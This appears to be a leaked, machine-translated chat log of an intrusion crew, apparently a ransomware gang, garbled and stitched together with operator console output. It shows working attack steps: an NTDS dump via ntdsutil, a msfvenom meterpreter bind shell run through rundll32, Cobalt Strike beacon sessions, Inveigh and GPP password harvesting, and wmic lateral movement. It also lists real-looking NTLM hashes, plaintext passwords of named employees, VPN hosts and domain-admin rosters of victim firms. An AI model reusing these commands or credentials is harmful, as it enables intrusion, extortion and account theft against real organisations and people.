Sqlcmd: Error: Microsoft SQL Server Native Client 10.0 : Login timeout expired ``what do I tell you about backing up the skull? then back it up from there didn't seem to be on these 30 esx? I went into the sphere and hand grated the snapshots and gather information from now on, knock it out and put it aside ask my colleague. i did not prepare it i.e. did you find it that time but did not format the esx? the sphere seems to be in the domain and the sphere is outside the domain and you did not notice it?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=AbGL2ZNE8my7DnLBb) the list in the sphere is closest say that the water is not ready how did you find these 30 esx?in principle, if you prepare something else to close, then you can do it tomorrow...while the others pull and matey backups 2 dbc someone 1 listings anyway updatekoby have? @all here all gather everyone then doodle you believeokayona fucked up, because 30 and a few esx you did not notice. and the whole server infrastructure is virtual - so it's up for grabs and it's fucked up then we can move[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=SmFGe7cJsJWC22kDb) doubt how much ssx you included? and from the file dumplists update it 100% on mail alerts? what you included ssx any light?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=AhnQrGWy9bQ9cgkLY) we'll get ready, close ~ two hours + time to work bildavam still pull the serversprod bases sbacapte quicklykonfy them cloudy if they have > 30 esxxcore morning in 4 hours?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=6YKD3tqykuwCKwGcG) no[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=rEDwQp4TD2g6p5iv7) so it would be faster to erase the cloud? that's them. a bunch of esx outside the domain have you checked for external backups? why? i already ssh on esx...then tomorrow it's already iron, we prepare it, no closing today, as i understand. they're about to have the morning...[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=2C4RfcwoibBwhT4Tx) back up the server shul for now, if there's no other interesting information, we'll take a couple of files in the box so I didn't figure out how to deal with the mail


user4
user4
6:47 PM
and with esxi is it worth downloading machine backups?

tl2
tl2
6:47 PM
I'm more interested in backups, not in vmk.
from the top of the company who is?
``And the database of whine take away and in parallel with this mail take away a couple of backups of virtuals+ listing of file trash from some folders IT, Finance, Acc, Prod set up listing of files with whine to show file size do not remember you updated hell on trust? and on the current one?

Alloy exchange
	ALLOYEXCH01
	ALLOYEXCH02 - 10.1.1.240
	GAH2K3EX

Alloy storages
	CROCKETTSTORAGE
	GAHSTORAGE
	ORANGESTORAGE
	RICHMONDSTORAGE 10.1.1.245
	
Alloy virt
	ALLOYVM01
	ALLOYXEN01
	ALLOYXENAPP
	
Alloy SQL
	ALLOYSQL01 -
	SQLPUBL - miss
	SQLREPLICA - miss

##### ===================================================================

rtpco storages
	CROCKETSTORAGE
FRANCESTORAGE
GERMANYSTORAGE
HENDSTORAGE
INDYSTORAGE
MXSTORAGE
NVSTORAGE
OHSTORAGE
ORANGESTORAGE 10.1.8.8
POLSTORAGE
SHENZHENSTORAGE
SINGSTORAGE
SUPERDATA
SUZHOUSTORAGE
TXSTORAGE
VASTORAGE
	
rtpco exchange
	EXCHANGE
	
rtpco virt & backup
	HENDVEEAM
	INVEEAM
	NEVADAHYPV1
	OHIOVEEAM
	SAN-HQ ????
	SNAP ????
	STORAGEWINONA
	STORAGEWINONA2
	
rtpco SQL
	AXSQL-DEV
	AXSQL-PROD
	SQLPROD1
	SQLSERVER
	
	
	

##### =================================================================

winona storages
	COLD ????
	SUPERDATA2
	
winona SQL
	AXSQL-PROD-OLD
	AXSQL-TRN
	SQLSRV1
	
	
``and the trust? are there petcort servers? are there files from them? do they have file dumpsters? yeshis is a couple more backups of what exactly? file listings are always with their sizes then what personal information do they not have? well this is all financial enough, not here look at all and recognizable already backed up? all[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=Y4Z5tgc5BREzr6NLB) have checked all yesh? -Mailbox mluckett -type 'Maill User' ?confused, there will be problems with office365type MailUsernet I understand that yuzak can not find so and then read the error? and still no did you make an updatestam all tnavilablе went to eksc consolev eas no accessutut imports a bit of a scam What VPN do you advise? So easy) you are also here) and what are you still here?)@tl1 We will spin them) you have 3 more sessions in the work) I hope there will be more) Thank you all! It was fun))))Thank you! See you on Monday, have a good one.Thank you all. I had a stressful and difficult week, but it made me happy) Good night! That's allKeep the manager open and see the "anomaly" think ahead, if there will be the service ac processes without a direct need on the machines where it should not be (we have a web service ac, judging by the login, and we work for DK) just jump into existing processes before that, better in winlogon jump as it is done:
1) check the status of the service which is responsible for this: `sc query vss`.
2) if off, then `sc start vss`, if on, then leave it
3) dump: `ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q
4) check service status `sc query vss`, and reset to original statemsfvenom -p windows/x64/meterpreter_bind_tcp rhost=10.10.30.17 lport=4444 --format raw -a x64 --platform windows --out bindshell.bin
4:55
upload /home/user/Desktop/shellConcat/bindshell64.dll
shell rundll32 C:\users\lgentry\bindshell64.dll
4:55
./shellConcatenation.1.0.0 --source=shellStarter_x64.dll --target=bindshell64.dll --addBin=bindshell.bin
stanislavtimofeish 5:01 PM
shell rundll32 C:\users\lentry\bindshell64.dll
msf6 exploit(multi/handler) >Now the task, take down the NTDS dump on dcfind_tag please report the results to your groups, what stage of progress now, have you decided, have you tried ps1 script via execute-assembly? https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1Нам you canlt, who will take over one more session? @user1 ?i wonder if they are so cospawned did not you put them? in the comments? maybe you still have one back there @user1 , @user3 there is another session, in the domain. who to give in work? who has the least load now? reciprocal thanks! Likewise.everyone have a nice appetite://dpaste.org/BIJKHelloGood morning0.dead.northerntrust.local-are there any more sessions left here?
jsteffenadmin:forestriver1111
``````
ADFS adminsolar ayoderadmin
azureadmin bhilladmin blackStratus$
BNelsonAdmin chailadmin CRMadmin
cwilsonadmin datacubepro dpawlakadmin
FaxAdmin gkoontzadmin gzapataadmin
i3bdr jsteffenadmin KGillisAdmin
mfinniganadmin MSOL_43139b2cee97 pcrusieadmin
rgoinsadmin ScaleService
SCCM-01$ sccmadmin sonicwalladmin
veeambr vmadmin


DC-01\azureadmin:::929b0230429b6f70911f7d7acae7193d:::
DC-01\FaxAdmin:::a1921b1097bcbad4b6da776328f46a3d:::
DC-01\i3bdr:::1363f55fc3af7705d2b87a1c6f6205f2:::
DC-01\mfinniganadmin:::9ebb1876eb12ab8e6455bc9a04bb0fc7:::
DC-01\rgoinsadmin:::51a879cd28cb71770144925c8efa13a2:::
DC-01\veeambr:::394738c76c3a43459001fb2cb60b0f4d:::
DC-01\adminsolar:::92e435850c723b9c178c03b070f011ba:::
DC-01\bhilladmin:::0fb7102c8c626e9f6425f000db62b724:::
DC-01\chailadmin:::e7024172cd68e7d2581bd456db4892b0:::
DC-01\datacubepro:::5d7e84015d28fd626e6a394d03a6b7e3:::
DC-01\gkoontzadmin:::a1cd8d118f899eee4e404307783e345d:::
DC-01\jsteffenadmin:::a37446e823dc85c627cb4f1a52fec991:::
DC-01\MSOL_43139b2cee97:::dd45fce8ee01243c31b07bf55280fd57:::
DC-01\ScaleService:::c90e32b26fa1c6ff5e23e4f322d85f09:::
DC-01\sccmadmin:::e8bd9c66ed562efaf9c7e72c795f347c:::
DC-01\ayoderadmin:::c44c4368b9eb73c6fbc02a63f0694af8:::
DC-01\dpawlakadmin:::9c78428402e8a82f193323eb61793dc1:::
DC-01\gzapataadmin:::9480d66020d16dbcdded7c570af3d760:::
DC-01\KGillisAdmin:::72a8777adcadc9403bfbc6863dcea85a:::
DC-01\pcrusieadmin:::1c836444443e986986bb1703dd563f6b:::
DC-01\ScanService:::3d686fcb6070a6698295be239391c01b:::
DC-01\sonicwalladmin:::54c1e5bab0f4e8d4c8da4d083da78f82:::
DC-01\vmadmin:::7e20a5b0c8de368b30977764f8b21e84:::
DC-01\ADFS:::7ba26362e2aa387335ff2a5f8beedddc:::
DC-01\BNelsonAdmin:::a5b05b0fdd0d835450da0bc03174b61f:::
DC-01\cwilsonadmin:::c37a053e98e824b7844777c404f4d319:::
DC-01\CRMadmin:::3d686fcb6070a6698295be239391c01b:::

``Give me the hashes of all YESes with their logins. What? The kerb is broken? All YESes are there.
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
´´CORP\ctxdbadmin´´ the last 5 min´s are cheerfully tapping out their death throes and session interruptions[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=mWnyWRB5HHczdREMG) although half an hour of sessions went out and came backuser8user4
the second session was blocked
more than 7 sessions - koba flies away all add here, anyway, they dropped the network nettest labs? now add to my teammate + do not see( (you have another chat for that)
Caption Description HotFixID InstalledOn

http://support.microsoft.com/?kbid=4576484 Update KB4576484 9/11/2020

http://support.microsoft.com/?kbid=4497165 Update KB4497165 5/26/2020

http://support.microsoft.com/?kbid=4503308 Security Update KB4503308 8/30/2019

http://support.microsoft.com/?kbid=4515383 Security Update KB4515383 9/10/2019

http://support.microsoft.com/?kbid=4515530 Security Update KB4515530 8/30/2019

http://support.microsoft.com/?kbid=4516115 Security Update KB4516115 9/11/2019

http://support.microsoft.com/?kbid=4517245 Update KB4517245 5/26/2020

http://support.microsoft.com/?kbid=4520390 Security Update KB4520390 10/4/2019

http://support.microsoft.com/?kbid=4521863 Security Update KB4521863 10/9/2019

http://support.microsoft.com/?kbid=4524244 Security Update KB4524244 2/14/2020

http://support.microsoft.com/?kbid=4524569 Security Update KB4524569 11/14/2019

http://support.microsoft.com/?kbid=4528759 Security Update KB4528759 1/15/2020

http://support.microsoft.com/?kbid=4537759 Security Update KB4537759 2/14/2020

http://support.microsoft.com/?kbid=4538674 Security Update KB4538674 2/13/2020

http://support.microsoft.com/?kbid=4541338 Security Update KB4541338 3/11/2020

http://support.microsoft.com/?kbid=4552152 Security Update KB4552152 4/16/2020

http://support.microsoft.com/?kbid=4560959 Security Update KB4560959 6/10/2020

http://support.microsoft.com/?kbid=4561600 Security Update KB4561600 6/11/2020

http://support.microsoft.com/?kbid=4565554 Security Update KB4565554 7/14/2020

http://support.microsoft.com/?kbid=4569073 Security Update KB4569073 8/13/2020

https://support.microsoft.com/help/4576751 Security Update KB4576751 9/9/2020

http://support.microsoft.com/?kbid=4576754 Update KB4576754 9/4/2020

https://support.microsoft.com/help/4574727 Update KB4574727 9/11/2020
``Host Name: HPENVY-072016-0
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18363 N/A Build 18363
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: admin
Registered Organization: Hewlett-Packard Company
Product ID: 00330-50219-28909-AAOEM
Original Install Date: 8/30/2019, 7:27:42 AM
System Boot Time: 9/10/2020, 9:15:59 PM
System Manufacturer: HP
System Model: 860-180st
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~4001 Mhz
BIOS Version: AMI A0.27, 8/17/2016
Windows Directory: C:\WINDOWS
System Directory: C:WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 32.704 MB
Available Physical Memory: 22.936 MB
Virtual Memory: Max Size: 37,568 MB
Virtual Memory: Available: 25,948 MB
Virtual Memory: In Use: 11,620 MB
Page File Location(s): C:\pagefile.sys
Domain: quotesmith.com
Logon Server:              \AGENTWEBDC01
Hotfix(s): 23 Hotfix(s) Installed.
                           [01]: KB4576484
                           [02]: KB4497165
                           [03]: KB4503308
                           [04]: KB4515383
                           [05]: KB4515530
                           [06]: KB4516115
                           [07]: KB4517245
                           [08]: KB4520390
                           [09]: KB4521863
                           [10]: KB4524244
                           [11]: KB4524569
                           [12]: KB4528759
                           [13]: KB4537759
                           [14]: KB4538674
                           [15]: KB4541338
                           [16]: KB4552152
                           [17]: KB4560959
                           [18]: KB4561600
                           [19]: KB4565554
                           [20]: KB4569073
                           [21]: KB4576751
                           [22]: KB4576754
                           [23]: KB4574727
Network Card(s): 2 NIC(s) Installed.
                           [01]: Intel(R) Dual Band Wireless-AC 3165
                                 Connection Name: Wi-Fi
                                 Status: Media disconnected.
                           [02]: Realtek PCIe GBE Family Controller
                                 Connection Name: Ethernet
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.1.1.137
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: No
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes
beacon> shell gpupdate
[*] Tasked beacon to run: gpupdate
[+] host called home, sent: 39 bytes
[+] received output:
Updating policy...



Computer policy could not be updated successfully. The following errors were encountered:



The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has successfully processed. If you do not see a success message for several hours, then contact your administrator.

User Policy could not be updated successfully. The following errors were encountered:



The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has successfully processed. If you do not see a success message for several hours, then contact your administrator.


To diagnose the failure, review the event log or run GPRESULT /H GPReport.html from the command line to access information about Group Policy results.


``IP 204.74.99.100
Host: crs.ultradns.net
City: San Mateo
Country: United States
IP range: Not defined
Name of Service Provider: ``Indefinite
URL : https://www.mydhl.dhl.com/mydhl/appmanager/smep/customerDesktop
Username : MatchesDC
Password : Customerservice123
``````
URL : https://matchesfashion.my.salesforce.com/
Username : mercedes.dinhamgrant@matchesfashion.com
Password : !PW!a35mM!iK3xg
``````
--- Chromium Credential (User: mercedesd) ---
URL : https://matchesfashion.slack.com/reset/enQtNzE2MTE2MzcxMzYwLTI3YjYzNGU2MTRlNTU0ZTYzOTlhOTdlZDkwNzhkNGY2ZTkyYjQ5NjNlZjUxYzIxNDIzODg5MTdlZTc2NmUwODQ
Username : mercedesd
Password : Dinham23

--- Chromium Credential (User: mercedesd) ---
URL : https://apps.matchesfashion.com/orderapp/login
Username : mercedes.dinhamgrant@matchesfashion.com
Password : Dinham23
``````
URL : https://career8.successfactors.com/career
Username : mercedesdinham@gmail.com
Password : C&:d56H?8WJzU/G
``````
URL : https://www.paypal.com/signin
Username : werkmodeldn@gmail.com
Password : Dinham23
``````
URL : https://www.peoplebank.com/pbank/owa/pbk07w00.logins
Username : Mercedesdinham
Password : Dinham23
``It makes sense to check this password on his account``.
URL : https://www.paypal.com/signin
Username : mercedesdinham@gmail.com
Password : Dinham23
``https://docs.fortinet.com/document/forticlient/6.0.2/administration-guide/209271/forticlient-windows-processes``
Non-authoritative answer:
Name : home.matchesremote.com
Address : 154.59.153.143

``````
                    <server>https://home.matchesremote.com:443</server>
```
And here is the right host to connect to ``.
<?xml version="1.0" encoding="utf-8" ?>
<forticlient_configuration>
    <forticlient_version>6.0.9.0277</forticlient_version>
    <version>6.0.9</version>
    <date>2020-09-17</date>
    <partial_configuration>1</partial_configuration>
    <os_version>windows</os_version>
    <vpn>
        <options>
            <disable_connect_disconnect>0</disable_connect_disconnect>
        </options>
        <sslvpn>
            <options>
                <enabled>1</enabled>
                <prefer_sslvpn_dns>1</prefer_sslvpn_dns>
                <dnscache_service_control>0</dnscache_service_control>
                <!--0=disable dnscache service, 1=do not touch dnscache service, 2=restart dnscache service, 3=sc control dnscache paramchange-->
                <use_legacy_ssl_adapter>0</use_legacy_ssl_adapter>
                <preferred_dtls_tunnel>0</preferred_dtls_tunnel>
                <block_ipv6>0</block_ipv6>
                <no_dhcp_server_route>0</no_dhcp_server_route>
                <no_dns_registration>0</no_dns_registration>
                <disallow_invalid_server_certificate>0</disallow_invalid_server_certificate>
            </options>
            <connections>
                <connection>
                    <name>MF</name>
                    <server>https://home.matchesremote.com:443</server>
                    <username></username>
                    <allow_standard_user_use_system_cert>0</allow_standard_user_use_system_cert>
                    <single_user_mode>0</single_user_mode>
                    <ui>
                        <show_remember_password>0</show_remember_password>
                        <show_alwaysup>0</show_alwaysup>
                        <show_autoconnect>0</show_autoconnect>
                        <save_username>0</save_username>
                    </ui>
                    <password></password>
                    <warn_invalid_server_certificate>0</warn_invalid_server_certificate>
                    <prompt_certificate>0</prompt_certificate>
                    <prompt_username>1</prompt_username>
                    <fgt>1</fgt>
                    <on_connect>
                        <script>
                            <os>windows</os>
                            <script>
                                <!--Write MS DOS batch script inside the CDATA tag below.
                                <!--One line per command, just like a regular batch script file.-->
                                <!--The script will be executed in the context of the user that connected the tunnel.-->
                                <!--Wherever you write #username# in your script, it will be automatically substituted with the xauth username of the user that connected the tunnel.-->.
                                <!--Wherever you write #password# in your script, it will be automatically substituted with the xauth password of the user that connected the tunnel.-->.
                                <!--Remember to check your xml file before deploying to ensure that carriage returns/line feeds are present.-->
                                <![CDATA[]]>
                            </script>
                        </script>
                    </on_connect>
                    <on_disconnect>
                        <script>
                            <os>windows</os>
                            <script>
                                <!--Write MS DOS batch script inside the CDATA tag below.
                                <!--One line per command, just like a regular batch script file.-->
                                <!--The script will be executed in the context of the user that connected the tunnel.-->
                                <!--Wherever you write #username# in your script, it will be automatically substituted with the xauth username of the user that connected the tunnel.-->.
                                <!--Wherever you write #password# in your script, it will be automatically substituted with the xauth password of the user that connected the tunnel.-->.
                                <!--Remember to check your xml file before deploying to ensure that carriage returns/line feeds are present.-->
                                <![CDATA[]]>
                            </script>
                        </script>
                    </on_disconnect>
                </connection>
            </connections>
        </sslvpn>
    </vpn>
</forticlient_configuration>

``but before it dies:``doesn't say anything-what do you mean by exporting? Backup is disabled
is it sad that they didn't get it up? although it's more about the AV base something from Fortinet
```
SerialNumber=FPT-FCS-DELL0000|Address=173.243.138.108:443|FDNListener=|TimeZone=0|AddrIPv6=
SerialNumber=FPT-FCS-DELL0008|Address=173.243.138.98:443|FDNListener=|TimeZone=-5|AddrIPv6=
SerialNumber=FPT-FCS-DELL0009|Address=173.243.138.99:443|FDNListener=|TimeZone=-8|AddrIPv6=
SerialNumber=FPT-FCS-DELL0010|Address=96.45.33.105:443|FDNListener=|TimeZone=-5|AddrIPv6=
SerialNumber=FPT-FCS-DELL0011|Address=96.45.33.106:443|FDNListener=|TimeZone=-5|AddrIPv6=
``Waiting for data
``Powerpick Invoke-Inveigh -Kerberos -FileOutput Y "C:\Users\mercedesd\AppData\Local\Microsoft\eula.txt"``Well, most likely his domain already known creeds can safely connect to VPN and see the domain
9296 4772 FortiTray.exe x64 1 MATCHES\mercedesd
3144 4772 FortiWF.exe x64 0 NT AUTHORITY\SYSTEM
1424 4772 FortiProxy.exe x64 0 NT AUTHORITY\SYSTEM
`` 1424 4772 FortiProxy.exe
 3144 4772 FortiWF.exe
 6412 4772 FCDBLog.exe
 6428 4772 fcappdb.exe
 7100 4772 FortiESNAC.exe
 7108 4772 FortiSSLVPNdaemon.exe
 7116 4772 FortiSettings.exe
 9296 4772 FortiTray.exe x64 1 MATCHES\mercedesd
 11900 4772 fortifws.exe
 18236 4772 fmon.exe
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain matches.com.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.

``Session returnedhttp://docs.fortinet.com/document/forticlient/6.0.0/configurator-tool/823336/use-forticlient-configurator-tool-tool-for-windowshttps://kb.fortinet.com/kb/documentLink.do?externalID=FD44157https://kb.fortinet.com/kb/documentLink.do?externalID=FD48788который leads to the domain```
   Description . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30)
```
you can search for fortikgat config of the VPN `` TCP 192.168.0.17:65182 SkyRouter:5431 ``sessions are not present - VPN is probably switched off so you can see the domain
if you get the output from the "domain admins" /dom
check that the domain is visible
Machine is not part of domain - exit.

``From the system.
```
beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Net-GPPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[+] received output:
Machine is not part of domain - exit.
```
From user
```
beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Net-GPPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[+] received output:
Processing files in \\MATCHES.COM\sysvol\MATCHES.COM\policies\.
[-] Invoke_3 on EntryPoint failed.
Did you check if the domain is visible at all?
Maybe there's a VPN disconnected from the domain )-Lists DK, yes?
`` beacon> execute-assembly SharpView.exe Get-Domain
[*] Tasked beacon to run .NET program: SharpView.exe Get-Domain
[+] host called home, sent: 841791 bytes
[+] received output:
An error occurred: 'System.IndexOutOfRangeException: Index was outside the bounds of the array.
   at SharpView.Program.Run(String[] args)
   at SharpView.Program.Main(String[] args)' ``it didn't work you forgot to put adfind here, please, for the sake of argument) you can poke the formatting in #general as an example ``Target : outlook.office365.com
  Comment : SspiPfc
  UserName : Mercedes.Dinhamgrant@matchesfashion.com
  Password : Dinham1989
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 13/03/2020 12:22:01

  Target : MicrosoftOffice16_Data:SSPI:Mercedes.Dinhamgrant@matchesfashion.com
  UserName :
  Password : Dinham1989
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 08/09/2020 16:02:18`
```
Target : outlook.office365.com
  Comment : SspiPfc
  UserName : Mercedes.Dinhamgrant@matchesfashion.com
  Password : Dinham1989
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 13/03/2020 12:22:01

  Target : MicrosoftOffice16_Data:SSPI:Mercedes.Dinhamgrant@matchesfashion.com
  UserName :
  Password : Dinham1989
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 08/09/2020 16:02:18
There's also a one-line formatting like ``marker``@user1 tell me how to format please the rest of usSo, drop in here the information you gathered, passwords found, ad info, sitbelt, and so on
and continue работать)eyJhbGciOiJB/360fJkwH4TQ6LODerkkb4TlbN0v/Zt5aK/BgoHABZb9CbTBU3YnjStc++ipt5xVxC+bbWj9EfCyMO1Z5+fFCt0TfdobT1dxN5hHr0SDk4Rv7YC7Ec2pFnt2aJsnJe9qk1T94PiNEQlmEAdKnkZq7glGAwZJeKgPCC7wLVY7OcU7+1Yn8ImX9o1DFMTAlVNwbhEgqNqQXaLOSn9/wpqySw==eyJhbGciOiJBxX2bvj2LLTDwhlBvieTlwrBkhX8ngIKIjBaetx8b1L/oWGkAX4QsbLWvPMO41Aw2FSqiJDsRumji0Vmlft5Jgu7mg/OQFau3h9PfdTZ4Z3bIrwbEKOouwr/RPgBVkFcdVrJoHJfebtGcRDUERbP0xYY5h1On7UYvrZzCUgWoYun0y7Hfd4vL7IbhDeP4h1yCRtyr+PJdF50UpZHPyJ4MCqYcUR9FiLMdZKXlS5eLx/vjVtpsGmwsbwJr13y/zpJGhVES0NyQoufK0lHF2X3riZXCeJLUYPnOOloPTv29n09YaPK6AuyehhCps925u7+mguikxaAxoyu99/BgirSOn60Ib73IHmpqNRFCnaMZZdw=eyJhbGciOiJBhFASKtrWS+mJFYNHEP7Z180TrNSuIruXJJ3m95kV4Z427KwnBGG5q44CwZZPMbh4hlnOHWuS8YF6xNGlxux9dwzxxqafgfvGCw8ycjgVNBVz5rf3tOtMJDjKOnNlQ1I7xxU3vBkHaW28kfkexpo0T9pKy8kN2AA088uri1tP84o=eyJhbGciOiJBu2oE1WMxl3Y59WYGluxRGl7vvKhmiwcAQgbXMj4+dYTHX2EgtD8Demco+OMkNmtVcLSrQjjE5LgyuIbtMhjV9JgKVqfFHeGJ+ixD3JlwPOstgei1xUltazxNKJNlYJUVIyhjSlZ8nvP08+xulm+mbrp9nmYM8pEeCUmE92t3/VU=otuser8tl2eyJhbGciOiJBI4OZkrnV7D96S EA's creeds are found, attempts are being made to sneak into the trusts to continue work10.10.30.24 what is Z?
C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\192.168.254.107\C$ ""WH20s.admin 1225kofq"" /user:lrhc.local\svc-aadc > C:\ProgramData\nts.txt && copy C:\ProgramData\nts.txt \\10.10.30.24\C$\ProgramData\nts.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 3428;
        ReturnValue = 0;
};


C:\Users\wevvewe\Desktop>dir Z:\ProgramData\nts.txt
 Volume in drive Z has no label.
 Volume Serial Number is 584E-4F0A

 Directory of Z:\ProgramData

12/15/2020 12:48 PM 0 nts.txt
               1 File(s) 0 bytes
               0 Dir(s) 4,098,580,480 bytes free
Can't you do a no-jouz with a direct quote and output it to a file so you don't have to do magic?
C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use > C:\ProgramData\eula_en.txt && copy C:\ProgramData\eula_un.txt \\10.10.30.24\C$\ProgramData\eula_en.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5588;
        ReturnValue = 0;
};
```

```
C:\Users\wevvewe\Desktop>type Z:\ProgramData\eula_en.txt
New connections will be remembered.

There are no entries in the list.
``````
C:\Users\wevvewe\Desktop>wmic /node:10.       10.30. 24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\\192.168.254.107\C$"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 7036;
        ReturnValue = 0;
};
``Then password)[ ](https://mediaeveryone.com/group/lrhc-org?msg=mb5ncYh6KZCcgbf4a) will it be like this? Write the ip like this ``10.       10.30. 24"}
C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc"/password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\192.168.254.107\C$"
ERROR:
Description = Access is denied.
``He gave me different commands with quotes, take the username polzakastop
C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user:lrhc.local\svc-aadc /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\\192.168.254.107\C$"
``I don't know my name is ``wanga''?
Invalid Global Switch.
Try the second one from the internal car with wmik and it's the same problem I had a problem with trust, it's not a problem at all, I thought maybe the output was wrong, it's a password with a space, compare it with a space))) it's not clear if it's with a space or what
Username Domain Password
-------- ------ --------
svc-aadc lrhc.local WH20s.admin 1225kofq
```
it's fucking stinky not found so fuckin' send me the hash and I'll give you the clearance. all right, to see the clearance you have to buy the check for free. now it's no fun who was logged in. we all got kicked out of the account so you changed your usernames and passwords. write 5.com how do I check hash from kmd? it's like 0...I would dal no yuz check it out can you give me a file with cleartexts from ntds? I want to check I do not understand what you're doing) this hash will eat? https://github.com/InfosecMatter/Minimalistic-offensive-security-tools/blob/master/smblogin.ps1ага
and how to download the hashes without a coba?) and stop shahesh what exactly do you want to download? so you downloaded? here they are EA with hashes of all collected and accidentally sent i threw the name + hash EA and did not understand what you threw) it's not all shaobl```
lrhc.org\PsService
327db612d1d53ac8477a49ae667d523c
 
lrhc.org\Pssupport01
8c3c72c186ece567004a620aff55d842
 
lrhc.org\svc-aadc
a5ed4977ab742434bd35761f3cb4c028
 
lrhc.org\TMSXE.Service01
a6aea38d860ac5c1e980a7724bd0362e
 
lrhc.org\UCAdmin
1c7c0878a380b6e004f97cd62af6398b
 
lrhc.org\frsecure
6888441821d91affeb5f8cad8a6cad7b

lrhc.org\Psupport
8c3c72c186ece567004a620aff55d842
 
lrhc.org\tms01
a6aea38d860ac5c1e980a7724bd0362e
 
lrhc.org\jyrkwa
ce52742a372f62d7100e9ca7b5f13369
``If you find the hash, I'll give you the clearance pass from EA?
dn:CN=ffmg.local,CN=System,DC=lrhc,DC=local
>whenCreated:2010/01/18-12:49:34 Central Standard Time
>name: ffmg.local
>securityIdentifier: S-1-5-21-111134195-3807604873-3122732003
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ffmg.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=mcklrh.mig,CN=System,DC=lrhc,DC=local
>whenCreated: 2018/02/14-17:38:43 Central Standard Time
>name: mcklrh.mig
>securityIdentifier: S-1-5-21-2653265968-1271411615-963851744
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: mcklrh.mig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ELEAH.LOCAL,CN=System,DC=lrhc,DC=local
>whenCreated: 2020/09/16-17:04:40 Central Standard Time
>name: ELEAH.LOCAL
>securityIdentifier: S-1-5-21-2327498286-4212857632-543316630
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ELEAH.LOCAL
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``There are 3 trusts, 1 in quarantine, I don't touch it, it turns out?
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 90
Minimum password length: 8
Length of password history maintained: 10
Lockout threshold: 10
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
``````
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator frsecure jyrkwa
PsService PsSupport Pssupport01
svc-aadc tms01 TMSXE.Service01
UCAdmin
The command completed successfully.
``````
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin Administrator AvamarBackupUser
CDW.Tech1 CDW.Tech2 CDW.Tech3
cdw.user01 cisadmin frsecure
gsnelson jyrkwa lljennbi
nmsapps OnPremMigAdmin1 OnPremMigAdmin2
OnPremMigAdmin3 pmpetecc PRHADMIN
PsService PsSupport Pssupport01
radmin tms01 TMSXE.Service01
UCAdmin WebAdmin
The command completed successfully.
